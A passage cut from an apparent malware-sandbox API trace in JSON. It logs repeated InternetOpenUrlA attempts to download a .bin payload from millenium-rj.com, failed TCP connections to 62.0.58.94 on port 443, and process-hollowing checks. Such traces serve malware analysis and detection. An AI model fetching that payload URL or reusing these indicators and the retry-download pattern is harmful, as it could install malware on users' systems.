"name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1847 }, { "timestamp": "2025-02-27 23:36:47,800", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1848 }, { "timestamp": "2025-02-27 23:36:47,800", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000003a8", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "936" } ], "repeated": 0, "id": 1849 }, { "timestamp": "2025-02-27 23:36:47,800", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003a8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1850 }, { "timestamp": "2025-02-27 23:36:47,800", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003a8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00P8q\\x00" } ], "repeated": 0, "id": 1851 }, { "timestamp": "2025-02-27 23:36:47,800", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "936" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1852 }, { "timestamp": "2025-02-27 23:36:47,800", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003a8" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\x283\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1853 }, { "timestamp": "2025-02-27 23:36:47,800", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "936" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1854 }, { "timestamp": "2025-02-27 23:36:47,800", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003a8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1855 }, { "timestamp": "2025-02-27 23:36:47,800", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003a8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1856 }, { "timestamp": "2025-02-27 23:36:47,800", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "936" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1857 }, { "timestamp": "2025-02-27 23:36:47,800", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "936" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1858 }, { "timestamp": "2025-02-27 23:36:49,847", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1859 }, { "timestamp": "2025-02-27 23:36:49,847", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "936" } ], "repeated": 0, "id": 1860 }, { "timestamp": "2025-02-27 23:36:49,847", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1861 }, { "timestamp": "2025-02-27 23:36:49,847", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc009c" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1862 }, { "timestamp": "2025-02-27 23:36:49,847", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1863 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1864 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc00a0", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1865 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1866 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc00a0" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1867 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x764e2689", "parentcaller": "0x73cbcb7a", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000050c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1868 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000500" } ], "repeated": 0, "id": 1869 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000520" } ], "repeated": 0, "id": 1870 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1871 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73d0512a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000518" } ], "repeated": 0, "id": 1872 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73cc2629", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000051c" } ], "repeated": 0, "id": 1873 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73d0517f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000050c" } ], "repeated": 0, "id": 1874 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77186a76", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000510" } ], "repeated": 0, "id": 1875 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 1876 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x00000510", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1296" } ], "repeated": 0, "id": 1877 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000510" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1878 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000510" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x98\\xa7t\\x00" } ], "repeated": 0, "id": 1879 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1296" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1880 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000510" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\x284\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1881 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1296" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1882 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000510" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1883 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000510" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1884 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1296" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1885 }, { "timestamp": "2025-02-27 23:36:50,862", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1296" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1886 }, { "timestamp": "2025-02-27 23:36:54,878", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72ec3a14", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1296" } ], "repeated": 0, "id": 1887 }, { "timestamp": "2025-02-27 23:36:54,878", "thread_id": "11160", "caller": "0x72e59ac9", "parentcaller": "0x72ddc292", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1888 }, { "timestamp": "2025-02-27 23:36:54,878", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc00a0" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1889 }, { "timestamp": "2025-02-27 23:36:54,878", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1890 }, { "timestamp": "2025-02-27 23:36:54,878", "thread_id": "11160", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1891 }, { "timestamp": "2025-02-27 23:36:55,894", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc00a4", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1892 }, { "timestamp": "2025-02-27 23:36:55,894", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1893 }, { "timestamp": "2025-02-27 23:36:55,894", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc00a4" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1894 }, { "timestamp": "2025-02-27 23:36:55,894", "thread_id": "11160", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1895 }, { "timestamp": "2025-02-27 23:36:55,894", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000003a8", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "936" } ], "repeated": 0, "id": 1896 }, { "timestamp": "2025-02-27 23:36:55,894", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003a8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1897 }, { "timestamp": "2025-02-27 23:36:55,894", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003a8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00P8q\\x00" } ], "repeated": 0, "id": 1898 }, { "timestamp": "2025-02-27 23:36:55,894", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "936" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1899 }, { "timestamp": "2025-02-27 23:36:55,894", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003a8" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\x286\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1900 }, { "timestamp": "2025-02-27 23:36:55,894", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "936" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1901 }, { "timestamp": "2025-02-27 23:36:55,894", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003a8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1902 }, { "timestamp": "2025-02-27 23:36:55,894", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003a8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1903 }, { "timestamp": "2025-02-27 23:36:55,894", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "936" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1904 }, { "timestamp": "2025-02-27 23:36:55,894", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "936" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1905 }, { "timestamp": "2025-02-27 23:36:57,925", "thread_id": "11160", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1906 }, { "timestamp": "2025-02-27 23:36:57,925", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "936" } ], "repeated": 0, "id": 1907 }, { "timestamp": "2025-02-27 23:36:57,925", "thread_id": "11160", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1908 }, { "timestamp": "2025-02-27 23:36:57,925", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc00a4" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1909 }, { "timestamp": "2025-02-27 23:36:57,925", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1910 }, { "timestamp": "2025-02-27 23:36:58,941", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1911 }, { "timestamp": "2025-02-27 23:36:58,941", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc00a8", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1912 }, { "timestamp": "2025-02-27 23:36:58,941", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1913 }, { "timestamp": "2025-02-27 23:36:58,941", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc00a8" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1914 }, { "timestamp": "2025-02-27 23:36:58,941", "thread_id": "11160", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1915 }, { "timestamp": "2025-02-27 23:36:58,941", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x0000052c", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1324" } ], "repeated": 0, "id": 1916 }, { "timestamp": "2025-02-27 23:36:58,941", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1917 }, { "timestamp": "2025-02-27 23:36:58,941", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x98\\xa7t\\x00" } ], "repeated": 0, "id": 1918 }, { "timestamp": "2025-02-27 23:36:58,941", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1919 }, { "timestamp": "2025-02-27 23:36:58,941", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { 